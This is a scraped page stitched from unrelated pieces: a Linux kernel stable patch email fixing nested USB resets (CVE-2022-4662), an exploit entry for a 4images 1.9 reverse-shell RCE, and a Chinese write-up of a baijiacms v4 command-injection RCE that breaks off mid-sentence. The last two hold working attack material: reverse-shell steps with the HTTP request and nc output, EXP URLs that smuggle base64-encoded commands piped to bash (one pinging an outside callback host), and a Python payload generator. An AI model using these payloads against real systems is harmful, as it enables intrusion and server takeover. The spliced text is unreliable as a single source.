A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
	stable@vger.kernel.org, Alan Stern <stern@rowland.harvard.edu>,
	Rondreis <linhaoguo86@gmail.com>
Subject: \[PATCH 5.4 053/108\] USB: core: Prevent nested device-reset calls
Date: Tue, 13 Sep 2022 16:06:24 +0200	\[thread overview\]
Message-ID: <20220913140355.910732567@linuxfoundation.org> (raw)
In-Reply-To: <20220913140353.549108748@linuxfoundation.org\>

From: Alan Stern <stern@rowland.harvard.edu>

commit 9c6d778800b921bde3bff3cff5003d1650f942d1 upstream.

Automatic kernel fuzzing revealed a recursive locking violation in
usb-storage:

============================================
WARNING: possible recursive locking detected
5.18.0 #3 Not tainted
--------------------------------------------
kworker/1:3/1205 is trying to acquire lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

but task is already holding lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

...

stack backtrace:
CPU: 1 PID: 1205 Comm: kworker/1:3 Not tainted 5.18.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_deadlock\_bug kernel/locking/lockdep.c:2988 \[inline\]
check\_deadlock kernel/locking/lockdep.c:3031 \[inline\]
validate\_chain kernel/locking/lockdep.c:3816 \[inline\]
\_\_lock\_acquire.cold+0x152/0x3ca kernel/locking/lockdep.c:5053
lock\_acquire kernel/locking/lockdep.c:5665 \[inline\]
lock\_acquire+0x1ab/0x520 kernel/locking/lockdep.c:5630
\_\_mutex\_lock\_common kernel/locking/mutex.c:603 \[inline\]
\_\_mutex\_lock+0x14f/0x1610 kernel/locking/mutex.c:747
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230
usb\_reset\_device+0x37d/0x9a0 drivers/usb/core/hub.c:6109
r871xu\_dev\_remove+0x21a/0x270 drivers/staging/rtl8712/usb\_intf.c:622
usb\_unbind\_interface+0x1bd/0x890 drivers/usb/core/driver.c:458
device\_remove drivers/base/dd.c:545 \[inline\]
device\_remove+0x11f/0x170 drivers/base/dd.c:537
\_\_device\_release\_driver drivers/base/dd.c:1222 \[inline\]
device\_release\_driver\_internal+0x1a7/0x2f0 drivers/base/dd.c:1248
usb\_driver\_release\_interface+0x102/0x180 drivers/usb/core/driver.c:627
usb\_forced\_unbind\_intf+0x4d/0xa0 drivers/usb/core/driver.c:1118
usb\_reset\_device+0x39b/0x9a0 drivers/usb/core/hub.c:6114

This turned out not to be an error in usb-storage but rather a nested
device reset attempt.  That is, as the rtl8712 driver was being
unbound from a composite device in preparation for an unrelated USB
reset (that driver does not have pre\_reset or post\_reset callbacks),
its ->remove routine called usb\_reset\_device() -- thus nesting one
reset call within another.

Performing a reset as part of disconnect processing is a questionable
practice at best.  However, the bug report points out that the USB
core does not have any protection against nested resets.  Adding a
reset\_in\_progress flag and testing it will prevent such errors in the
future.

Link: https://lore.kernel.org/all/CAB7eexKUpvX-JNiLzhXBDWgfg2T9e9\_0Tw4HQ6keN==voRbP0g@mail.gmail.com/
Cc: stable@vger.kernel.org
Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Link: https://lore.kernel.org/r/YwkflDxvg0KWqyZK@rowland.harvard.edu
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
 drivers/usb/core/hub.c |   10 ++++++++++
 include/linux/usb.h    |    2 ++
 2 files changed, 12 insertions(+)

--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5923,6 +5923,11 @@ re\_enumerate\_no\_bos:
  \* the reset is over (using their post\_reset method).
  \*
  \* Return: The same as for usb\_reset\_and\_verify\_device().
+ \* However, if a reset is already in progress (for instance, if a
+ \* driver doesn't have pre\_ or post\_reset() callbacks, and while
+ \* being unbound or re-bound during the ongoing reset its disconnect()
+ \* or probe() routine tries to perform a second, nested reset), the
+ \* routine returns -EINPROGRESS.
  \*
  \* Note:
  \* The caller must own the device lock.  For example, it's safe to use
@@ -5956,6 +5961,10 @@ int usb\_reset\_device(struct usb\_device \*
 		return -EISDIR;
 	}
 
+	if (udev->reset\_in\_progress)
+		return -EINPROGRESS;
+	udev->reset\_in\_progress = 1;
+
 	port\_dev = hub->ports\[udev->portnum - 1\];
 
 	/\*
@@ -6020,6 +6029,7 @@ int usb\_reset\_device(struct usb\_device \*
 
 	usb\_autosuspend\_device(udev);
 	memalloc\_noio\_restore(noio\_flag);
+	udev->reset\_in\_progress = 0;
 	return ret;
 }
 EXPORT\_SYMBOL\_GPL(usb\_reset\_device);
--- a/include/linux/usb.h
+++ b/include/linux/usb.h
@@ -580,6 +580,7 @@ struct usb3\_lpm\_parameters {
  \* @devaddr: device address, XHCI: assigned by HW, others: same as devnum
  \* @can\_submit: URBs may be submitted
  \* @persist\_enabled:  USB\_PERSIST enabled for this device
+ \* @reset\_in\_progress: the device is being reset
  \* @have\_langid: whether string\_langid is valid
  \* @authorized: policy has said we can use it;
  \*	(user space) policy determines if we authorize this device to be
@@ -665,6 +666,7 @@ struct usb\_device {
 
 	unsigned can\_submit:1;
 	unsigned persist\_enabled:1;
+	unsigned reset\_in\_progress:1;
 	unsigned have\_langid:1;
 	unsigned authorized:1;
 	unsigned authenticated:1;

next prev parent reply	other threads:\[~2022-09-13 15:01 UTC|newest\]

**Thread overview:** 114+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-09-13 14:05 \[PATCH 5.4 000/108\] 5.4.212-rc1 review Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 001/108\] efi: capsule-loader: Fix use-after-free in efi\_capsule\_write Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 002/108\] wifi: iwlegacy: 4965: corrected fix for potential off-by-one overflow in il4965\_rs\_fill\_link\_cmd() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 003/108\] net: mvpp2: debugfs: fix memory leak when using debugfs\_lookup() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 004/108\] fs: only do a memory barrier for the first set\_buffer\_uptodate() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 005/108\] Revert "mm: kmemleak: take a full lowmem check in kmemleak\_\*\_phys()" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 006/108\] net: dp83822: disable false carrier interrupt Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 007/108\] drm/msm/dsi: fix the inconsistent indenting Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 008/108\] drm/msm/dsi: Fix number of regulators for msm8996\_dsi\_cfg Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 009/108\] platform/x86: pmc\_atom: Fix SLP\_TYPx bitfield mask Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 010/108\] iio: adc: mcp3911: make use of the sign bit Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 011/108\] ieee802154/adf7242: defer destroy\_workqueue call Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 012/108\] wifi: cfg80211: debugfs: fix return type in ht40allow\_map\_read() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 013/108\] Revert "xhci: turn off port power in shutdown" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 014/108\] net: sched: tbf: dont call qdisc\_put() while holding tree lock Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 015/108\] ethernet: rocker: fix sleep in atomic context bug in neigh\_timer\_handler Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 016/108\] kcm: fix strp\_init() order and cleanup Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 017/108\] sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 018/108\] tcp: annotate data-race around challenge\_timestamp Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 019/108\] Revert "sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 020/108\] net/smc: Remove redundant refcount increase Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 021/108\] serial: fsl\_lpuart: RS485 RTS polariy is inverse Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 022/108\] staging: rtl8712: fix use after free bugs Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 023/108\] powerpc: align syscall table for ppc32 Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 024/108\] vt: Clear selection before changing the font Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 025/108\] tty: serial: lpuart: disable flow control while waiting for the transmit engine to complete Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 026/108\] Input: iforce - wake up after clearing IFORCE\_XMIT\_RUNNING flag Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 027/108\] iio: adc: mcp3911: use correct formula for AD conversion Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 028/108\] misc: fastrpc: fix memory corruption on probe Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 029/108\] misc: fastrpc: fix memory corruption on open Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 030/108\] USB: serial: ftdi\_sio: add Omron CS1W-CIF31 device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 031/108\] binder: fix UAF of ref->proc caused by race condition Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 032/108\] usb: dwc3: qcom: fix use-after-free on runtime-PM wakeup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 033/108\] drm/i915/reg: Fix spelling mistake "Unsupport" -> "Unsupported" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 034/108\] clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 035/108\] Revert "clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 036/108\] clk: core: Fix runtime PM sequence in clk\_core\_unprepare() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 037/108\] Input: rk805-pwrkey - fix module autoloading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 038/108\] clk: bcm: rpi: Fix error handling of raspberrypi\_fw\_get\_rate Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 039/108\] hwmon: (gpio-fan) Fix array out of bounds access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 040/108\] gpio: pca953x: Add mutex\_lock for regcache sync in PM Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 041/108\] thunderbolt: Use the actual buffer in tb\_async\_error() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 042/108\] xhci: Add grace period after xHC start to prevent premature runtime suspend Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 043/108\] USB: serial: cp210x: add Decagon UCA device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 044/108\] USB: serial: option: add support for OPPO R11 diag port Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 045/108\] USB: serial: option: add Quectel EM060K modem Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 046/108\] USB: serial: option: add support for Cinterion MV32-WA/WB RmNet mode Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 047/108\] usb: typec: altmodes/displayport: correct pin assignment for UFP receptacles Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 048/108\] usb: dwc2: fix wrong order of phy\_power\_on and phy\_init Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 049/108\] USB: cdc-acm: Add Icom PMR F3400 support (0c26:0020) Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 050/108\] usb-storage: Add ignore-residue quirk for NXP PN7462AU Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 051/108\] s390/hugetlb: fix prepare\_hugepage\_range() check for 2 GB hugepages Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 052/108\] s390: fix nospec table alignments Greg Kroah-Hartman
**2022-09-13 14:06 \` Greg Kroah-Hartman \[this message\]**
2022-09-13 14:06 \` \[PATCH 5.4 054/108\] usb: gadget: mass\_storage: Fix cdrom data transfers on MAC-OS Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 055/108\] driver core: Dont probe devices after bus\_type.match() probe deferral Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 056/108\] wifi: mac80211: Dont finalize CSA in IBSS mode if state is disconnected Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 057/108\] ip: fix triggering of icmp redirect Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 058/108\] net: mac802154: Fix a condition in the receive path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 059/108\] ALSA: seq: oss: Fix data-race for max\_midi\_devs access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 060/108\] ALSA: seq: Fix data-race at module auto-loading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 061/108\] drm/i915/glk: ECS Liva Q2 needs GLK HDMI port timing quirk Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 062/108\] btrfs: harden identification of a stale device Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 063/108\] usb: dwc3: fix PHY disable sequence Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 064/108\] usb: dwc3: disable USB core PHY management Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 065/108\] USB: serial: ch341: fix lost character on LCR updates Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 066/108\] USB: serial: ch341: fix disabled rx timer on older devices Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 067/108\] scsi: megaraid\_sas: Fix double kfree() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 068/108\] drm/gem: Fix GEM handle release errors Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 069/108\] drm/amdgpu: Check num\_gfx\_rings for gfx v9\_0 rb setup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 070/108\] drm/radeon: add a force flush to delay work when radeon Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 071/108\] parisc: ccio-dma: Handle kmalloc failure in ccio\_init\_resources() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 072/108\] parisc: Add runtime check to prevent PA2.0 kernels on PA1.x machines Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 073/108\] arm64: cacheinfo: Fix incorrect assignment of signed error value to unsigned fw\_level Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 074/108\] arm64/signal: Raise limit on stack frames Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 075/108\] fbdev: chipsfb: Add missing pci\_disable\_device() in chipsfb\_pci\_init() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 076/108\] drm/amdgpu: mmVM\_L2\_CNTL3 register not initialized correctly Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 077/108\] ALSA: emu10k1: Fix out of bounds access in snd\_emu10k1\_pcm\_channel\_alloc() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 078/108\] ALSA: aloop: Fix random zeros in capture data when using jiffies timer Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 079/108\] ALSA: usb-audio: Fix an out-of-bounds bug in \_\_snd\_usb\_parse\_audio\_interface() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 080/108\] kprobes: Prohibit probes in gate area Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 081/108\] debugfs: add debugfs\_lookup\_and\_remove() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 082/108\] nvmet: fix a use-after-free Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 083/108\] scsi: mpt3sas: Fix use-after-free warning Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 084/108\] scsi: lpfc: Add missing destroy\_workqueue() in error path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 085/108\] cgroup: Optimize single thread migration Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 086/108\] cgroup: Elide write-locking threadgroup\_rwsem when updating csses on an empty subtree Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 087/108\] cgroup: Fix threadgroup\_rwsem <-> cpus\_read\_lock() deadlock Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 088/108\] smb3: missing inode locks in punch hole Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 089/108\] ARM: dts: imx6qdl-kontron-samx6i: remove duplicated node Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 090/108\] regulator: core: Clean up on enable failure Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 091/108\] RDMA/cma: Fix arguments order in net device validation Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 092/108\] soc: brcmstb: pm-arm: Fix refcount leak and \_\_iomem leak bugs Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 093/108\] RDMA/hns: Fix supported page size Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 094/108\] netfilter: br\_netfilter: Drop dst references before setting Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 095/108\] netfilter: nf\_conntrack\_irc: Fix forged IP logic Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 096/108\] rxrpc: Fix an insufficiently large sglist in rxkad\_verify\_packet\_2() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 097/108\] afs: Use the operation issue time instead of the reply time for callbacks Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 098/108\] sch\_sfb: Dont assume the skb is still around after enqueueing to child Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 099/108\] tipc: fix shift wrapping bug in map\_get() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 100/108\] i40e: Fix kernel crash during module removal Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 101/108\] RDMA/siw: Pass a pointer to virt\_to\_page() Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 102/108\] ipv6: sr: fix out-of-bounds read when setting HMAC data Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 103/108\] RDMA/mlx5: Set local port to one when accessing counters Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 104/108\] nvme-tcp: fix UAF when detecting digest errors Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 105/108\] tcp: fix early ETIMEDOUT after spurious non-SACK RTO Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 106/108\] sch\_sfb: Also store skb len before calling child enqueue Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 107/108\] x86/nospec: Fix i386 RSB stuffing Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 108/108\] MIPS: loongson32: ls1c: Fix hang during startup Greg Kroah-Hartman
2022-09-14  9:37 \` \[PATCH 5.4 000/108\] 5.4.212-rc1 review Sudip Mukherjee
2022-09-14 11:43 \` Naresh Kamboju
2022-09-14 20:19 \` Florian Fainelli
2022-09-15  0:14 \` Guenter Roeck
2022-09-17  3:06 \` zhouzhixiu

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20220913140355.910732567@linuxfoundation.org \\
    --to=gregkh@linuxfoundation.org \\
    --cc=linhaoguo86@gmail.com \\
    --cc=linux-kernel@vger.kernel.org \\
    --cc=stable@vger.kernel.org \\
    --cc=stern@rowland.harvard.edu \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2022-4662: [PATCH 5.4 053/108] USB: core: Prevent nested device-reset calls

4images version 1.9 suffers from a remote command execution vulnerability.

    # Exploit Title: 4images 1.9 - Remote Command Execution# Exploit Author: Andrey Stoykov# Software Link: https://www.4homepages.de/download-4images# Version: 1.9# Tested on: Ubuntu 20.04To reproduce do the following:1. Login as administrator user2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"3. Select Template "categories.html"4. Paste reverse shell code5. Click "Save Changes"6. Browse to "http://host/4images/categories.php?cat_id=1"// HTTP POST request showing reverse shell payloadPOST /4images/admin/templates.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]// HTTP redirect response to specific templateGET /4images/categories.php?cat_id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]# nc -kvlp 4444listening on [any] 4444 ...connect to [127.0.0.1] from localhost [127.0.0.1] 43032Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up  2:18,  2 users,  load average: 0.09, 0.68, 0.56USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHATkali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-sessionkali     pts/1    -                11:58    1:40  24.60s  0.14s sudo suuid=1(daemon) gid=1(daemon) groups=1(daemon)/bin/sh: 0: can't access tty; job control turned off$

4images 1.9 Remote Command Execution

A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.

项目地址：https://github.com/baijiacms/baijiacmsV4  
版本：V4.1.4 20170105 FINAL  
环境：

*   php 5.5.38
*   nginx 1.15
*   mysql 5.7.27
*   20.04.1-Ubuntu

漏洞点在文件includes/baijiacms/common.inc.php  
第654行。

**利用**

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞，需要先登录后台，在附近设置中设置图片压缩比例，否则代码无法运行到此处。

EXP1：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

其中poc可以使用一下代码生成，随后开启web服务确保可以被访问到即可

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  

import base64  
  
cmd = input("cmd>>> ")   
  
b64cmd = base64.b64encode(cmd.encode()).decode()  
  
payload = f"echo {b64cmd}|base64 -d|bash"  
  
print(payload)  
payload = payload.replace(' ','${IFS}')  
print(payload)  
  
name = input("name>>>")  
payload = f"{name}.;{payload};"  
print(payload)  
  
with open(file=webpath+payload,mode='w')as f:  
    f.write('1')  
  
  

**原理**

在该漏洞中，漏洞点为文件includes/baijiacms/common.inc.php  
第654行的system()。该函数位于file\_save()函数中。

1  

system('convert'.$quality\_command.' '.$file\_full\_path.' '.$file\_full\_path);  

其中，$quality\_command无法控制，能够控制的只有$file\_full\_path。

由于上一步调用file\_save()的，是fetch\_net\_file\_upload()函数的return部分

$file\_full\_path的定义往上翻为：

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

$file\_full\_path = WEB\_ROOT .$path . $extpath. $filename;  
  
  
$path = '/attachment/';  
$extpath\="{$extention}/" . date('Y/m/');  
$filename = random(15) . ".{$extention}";  
  
  
$extention = pathinfo($url,PATHINFO\_EXTENSION );  
  

所以能使用的payload只能存在于url后的文件名后缀中，且payload中由于代码功能的限制不能出现，

*   htmlspecialchars()
    
    *   includes/baijiacms.php line92 :$\_GP = irequestsplite($\_GP);
    *   &
    *   “
    *   ’
    *   <
    *   \>
*   后缀 (pathinfo())
    
    *   includes/baijiacms/common.inc.php line 617 :$extention = pathinfo($url,PATHINFO\_EXTENSION );
    *   .
*   file\_get\_contents()
    
    *   includes/baijiacms/common.inc.php line632 :if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    *   空格
*   文件名
    
    *   web服务器系统类型，在windows下限制颇多
    *   windows
        *   \\
        *   /
        *   :
        *   \*
        *   ?
        *   |
    *   linux
        *   /

**htmlspecialchars()**

在该系统中，所有的参数都会经过includes/baijiacms.php进行htmlspecialchars过滤

所以payload中首先排除了 < > “ ‘ &这些符号

**pathinfo()**

pathinfo()会返回文件路径的信息

1  

$extention = pathinfo($url,PATHINFO\_EXTENSION );  

代码中传入了PATHINFO\_EXTENSION参数，根据官方介绍，传入该参数，只会返回最后一个扩展名，扩展名以 . 划分。结合后面的分析，所以payload只能存在与扩展名中

**file\_get\_contents()**

这一步有两个条件，首先file\_get\_contents()需要可以get到文件，其次文件中需要有内容满足file\_put\_contents()

1  

if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false)   

**$settings\[‘image\_compress\_openscale’\]**

最后在file\_save()中还有一步

1  

if(!empty($settings\['image\_compress\_openscale'\]))  

这一步在略读了代码后才知道，它由函数globaPriveteSystemSetting()获的，取自数据库中。

略读代码后才知道，这个需要在后台中开启图片上传压缩才会在数据库中建立数据。以便后续读取。

所以需要在后台的附件设置中开启并设置图片压缩比例（具体数字随意）

**具体利用过程解析**

EXP:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/\[whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;\](http://42.193.178.194/whoami.%3Becho%24{IFS}d2hvYW1p|base64%24{IFS}-d|bash%3B)&status=1&beid=1

这端url中，主要起作用的是url参数，其他的只是陪跑的（但是也不能删）。url参数原本是远程图片地址。

首先在自己的vps上设置payload，这里我设置的命令为whoami，为了便于区分payload，文件名也取名为whoami。然后使用python开启web服务。

然后登录baijiacms后台，设置一个压缩比例，保存，然后访问

http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.%3Becho%24%7BIFS%7Dd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash%3B&status=1&beid=1

然后我们来看debug。

代码运行到fetch\_net\_file\_upload函数中，走到$extention = pathinfo($url,PATHINFO\_EXTENSION );时，截取到了payload：;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

随后是mkdir根据时间，后缀，建立文件夹。之后来到if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) 进行判断，这边我为了方便查看file\_get\_contents和file\_put\_contents哪个会出问题，多加了两行代码。

1  
2  

$flag1 = file\_put\_contents($file\_tmp\_name,"1");  
$flag2 = file\_get\_contents($url);  

在这里之后进入file\_save() 。传入了关键的变量

$file\_full\_path：/www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/G55bRGvfRVr00o3.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

这边经过几个判断后，最后到达system()，最终传入的命令为。

